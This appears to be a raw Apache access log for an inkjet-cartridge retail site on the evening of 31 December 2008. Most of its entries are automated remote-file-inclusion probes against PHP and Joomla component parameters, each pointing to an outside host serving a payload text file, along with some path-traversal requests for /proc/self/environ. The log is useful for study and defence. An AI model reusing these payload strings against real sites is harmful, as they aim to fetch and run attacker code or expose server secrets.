87.106.245.44 - - [31/Dec/2008:17:27:58 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
87.106.245.44 - - [31/Dec/2008:17:27:58 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
87.106.245.44 - - [31/Dec/2008:17:27:58 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.222.23.200 - - [31/Dec/2008:17:28:50 -0800] "GET /logs///index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.222.23.200 - - [31/Dec/2008:17:28:50 -0800] "GET //index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
84.54.137.9 - - [31/Dec/2008:17:31:03 -0800] "GET /logs/access_081101.log///index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
84.54.137.9 - - [31/Dec/2008:17:31:04 -0800] "GET //index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
84.243.214.11 - - [31/Dec/2008:17:32:52 -0800] "GET /logs/index.php3?lang=http://cobra11fuchs.altervista.org/IDvalido.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
84.243.214.11 - - [31/Dec/2008:17:32:52 -0800] "GET /index.php3?lang=http://cobra11fuchs.altervista.org/IDvalido.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
213.165.79.77 - - [31/Dec/2008:17:38:37 -0800] "GET /logs/access_081101.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
200.132.74.7 - - [31/Dec/2008:17:39:24 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
200.132.74.7 - - [31/Dec/2008:17:39:24 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
200.132.74.7 - - [31/Dec/2008:17:39:24 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
66.249.65.203 - - [31/Dec/2008:17:42:18 -0800] "GET /phpbb/search.php?search_author=inkjetcartridge&sid=d6464f783a6902a5d60c4e1c99fa1efa HTTP/1.1" 200 454 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "site.inkjetcartridge.com"
64.128.80.16 - - [31/Dec/2008:17:42:24 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.geocities.com/geger212/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "site.inkjetcartridge.com"
64.128.80.16 - - [31/Dec/2008:17:42:26 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.geocities.com/geger212/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "site.inkjetcartridge.com"
62.101.68.240 - - [31/Dec/2008:17:43:20 -0800] "GET /include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.geocities.com/amik5968/waw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
200.27.116.182 - - [31/Dec/2008:17:45:38 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
89.108.87.248 - - [31/Dec/2008:17:49:25 -0800] "GET /logs//index.php?option=com_pcchess&Itemid=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
89.108.87.248 - - [31/Dec/2008:17:49:25 -0800] "GET /logs/access.log//index.php?option=com_pcchess&Itemid=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
89.108.87.248 - - [31/Dec/2008:17:49:25 -0800] "GET /index.php?option=com_pcchess&Itemid=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
91.142.211.198 - - [31/Dec/2008:17:52:06 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
124.82.79.138 - - [31/Dec/2008:17:55:07 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
124.82.79.138 - - [31/Dec/2008:17:55:14 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
124.82.79.138 - - [31/Dec/2008:17:55:15 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:56:05 -0800] "GET /logs/access_081101.log///index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:56:05 -0800] "GET //index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:56:05 -0800] "GET /logs///index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
124.82.79.138 - - [31/Dec/2008:17:57:15 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
124.82.79.138 - - [31/Dec/2008:17:57:15 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
124.82.79.138 - - [31/Dec/2008:17:57:17 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
200.27.116.182 - - [31/Dec/2008:17:59:01 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
200.27.116.182 - - [31/Dec/2008:17:59:56 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
200.27.116.182 - - [31/Dec/2008:17:59:56 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
210.59.227.15 - - [31/Dec/2008:18:01:16 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "site.inkjetcartridge.com"
210.59.227.15 - - [31/Dec/2008:18:01:16 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "site.inkjetcartridge.com"
210.59.227.15 - - [31/Dec/2008:18:01:16 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "site.inkjetcartridge.com"
210.59.227.15 - - [31/Dec/2008:18:05:52 -0800] "GET /logs/access_081101.log/modules/Neos_Chronos/header.php?base_folder=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "site.inkjetcartridge.com"
79.148.238.69 - - [31/Dec/2008:18:08:21 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
79.148.238.69 - - [31/Dec/2008:18:08:22 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
79.148.238.69 - - [31/Dec/2008:18:08:23 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:18:08:29 -0800] "GET /?index.php?mosConfig_absolute_path=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 200 2132 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:18:08:29 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 200 1229 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
213.226.166.122 - - [31/Dec/2008:18:09:06 -0800] "GET /logs/phphtml.php?htmlclass_path=http://cobra11fuchs.altervista.org/iddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
213.226.166.122 - - [31/Dec/2008:18:09:06 -0800] "GET /phphtml.php?htmlclass_path=http://cobra11fuchs.altervista.org/iddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
213.226.166.122 - - [31/Dec/2008:18:09:09 -0800] "GET /logs/phphtml.php?htmlclass_path=http://cobra11fuchs.altervista.org/iddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
213.226.166.122 - - [31/Dec/2008:18:09:10 -0800] "GET /phphtml.php?htmlclass_path=http://cobra11fuchs.altervista.org/iddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
77.221.130.14 - - [31/Dec/2008:18:15:24 -0800] "GET /logs/access.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "site.inkjetcartridge.com"
77.221.130.14 - - [31/Dec/2008:18:15:24 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "site.inkjetcartridge.com"
77.221.130.14 - - [31/Dec/2008:18:15:24 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "site.inkjetcartridge.com"
77.221.130.14 - - [31/Dec/2008:18:15:41 -0800] "GET /logs/access.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
77.221.130.14 - - [31/Dec/2008:18:15:41 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
77.221.130.14 - - [31/Dec/2008:18:15:41 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
200.27.116.182 - - [31/Dec/2008:18:18:42 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
200.27.116.182 - - [31/Dec/2008:18:18:42 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
200.27.116.182 - - [31/Dec/2008:18:18:43 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
207.69.140.37 - - [31/Dec/2008:18:27:34 -0800] "GET /email/images/inkmail7_02.gif HTTP/1.1" 200 16965 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; FunWebProducts; PeoplePal 6.2; .NET CLR 1.1.4322; PeoplePal 6.6)" "site.inkjetcartridge.com"
207.69.140.37 - - [31/Dec/2008:18:27:34 -0800] "GET /email/images/inkmail7_01.gif HTTP/1.1" 200 7496 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; FunWebProducts; PeoplePal 6.2; .NET CLR 1.1.4322; PeoplePal 6.6)" "site.inkjetcartridge.com"
207.69.140.37 - - [31/Dec/2008:18:27:34 -0800] "GET /email/images/inkmail7_03.gif HTTP/1.1" 200 18076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; FunWebProducts; PeoplePal 6.2; .NET CLR 1.1.4322; PeoplePal 6.6)" "site.inkjetcartridge.com"
207.69.140.37 - - [31/Dec/2008:18:27:34 -0800] "GET /email/images/inkmail7_05.gif HTTP/1.1" 200 16767 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; FunWebProducts; PeoplePal 6.2; .NET CLR 1.1.4322; PeoplePal 6.6)" "site.inkjetcartridge.com"
207.69.140.37 - - [31/Dec/2008:18:27:34 -0800] "GET /email/images/inkmail7_06.gif HTTP/1.1" 200 26753 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; FunWebProducts; PeoplePal 6.2; .NET CLR 1.1.4322; PeoplePal 6.6)" "site.inkjetcartridge.com"
207.69.140.37 - - [31/Dec/2008:18:27:34 -0800] "GET /email/images/inkmail7_04.gif HTTP/1.1" 200 17259 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; FunWebProducts; PeoplePal 6.2; .NET CLR 1.1.4322; PeoplePal 6.6)" "site.inkjetcartridge.com"
200.27.116.182 - - [31/Dec/2008:18:33:38 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
200.27.116.182 - - [31/Dec/2008:18:33:38 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
200.27.116.182 - - [31/Dec/2008:18:33:39 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
212.99.231.50 - - [31/Dec/2008:18:36:31 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.99.231.50 - - [31/Dec/2008:18:36:31 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.99.231.50 - - [31/Dec/2008:18:36:31 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.99.231.50 - - [31/Dec/2008:18:37:20 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.99.231.50 - - [31/Dec/2008:18:37:20 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.99.231.50 - - [31/Dec/2008:18:37:20 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.99.231.50 - - [31/Dec/2008:18:37:43 -0800] "GET /logs/scripts.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.99.231.50 - - [31/Dec/2008:18:38:38 -0800] "GET /logs/scripts.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
213.226.166.122 - - [31/Dec/2008:18:39:56 -0800] "GET /logs/scripts.log/errors.php?error=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
213.226.166.122 - - [31/Dec/2008:18:39:56 -0800] "GET /errors.php?error=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
213.226.166.122 - - [31/Dec/2008:18:39:56 -0800] "GET /logs/errors.php?error=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
154.11.13.142 - - [31/Dec/2008:18:42:32 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
154.11.13.142 - - [31/Dec/2008:18:42:32 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
154.11.13.142 - - [31/Dec/2008:18:42:33 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
154.11.13.142 - - [31/Dec/2008:18:44:30 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
84.205.233.139 - - [31/Dec/2008:18:52:25 -0800] "GET /phpbb/viewtopic.php?p=9293 HTTP/1.1" 200 533 "http://www.firstruleta.com/juegosdeazarengeneral10.php" "Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)" "site.inkjetcartridge.com"
65.55.105.170 - - [31/Dec/2008:18:59:31 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
65.55.105.170 - - [31/Dec/2008:18:59:31 -0800] "GET /email/?S=A HTTP/1.1" 200 659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
65.55.105.170 - - [31/Dec/2008:18:59:33 -0800] "GET /boomerang_images/?N=D HTTP/1.1" 200 2374 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
154.11.13.142 - - [31/Dec/2008:19:17:54 -0800] "GET /logs/access_081101.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
121.170.11.100 - - [31/Dec/2008:19:24:29 -0800] "GET /phphtml.php?htmlclass_path=http://www.desifans.com/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
121.170.11.100 - - [31/Dec/2008:19:24:29 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.desifans.com/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
121.170.11.100 - - [31/Dec/2008:19:24:29 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.desifans.com/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:19:33:52 -0800] "GET /logs/scripts.log/errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:19:33:52 -0800] "GET /errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:19:33:52 -0800] "GET /logs/errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:19:34:36 -0800] "GET /logs/scripts.log/errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:19:34:36 -0800] "GET /errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:19:34:36 -0800] "GET /logs/errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:19:38:13 -0800] "GET /logs/scripts.log/errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:19:38:13 -0800] "GET /errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:19:38:13 -0800] "GET /logs/errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "site.inkjetcartridge.com"
74.208.145.116 - - [31/Dec/2008:19:48:57 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
74.208.145.116 - - [31/Dec/2008:19:48:57 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
74.208.145.116 - - [31/Dec/2008:19:48:58 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
74.208.145.116 - - [31/Dec/2008:19:48:58 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
74.208.145.116 - - [31/Dec/2008:19:48:58 -0800] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "site.inkjetcartridge.com"
74.208.145.116 - - [31/Dec/2008:19:48:58 -0800] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "site.inkjetcartridge.com"
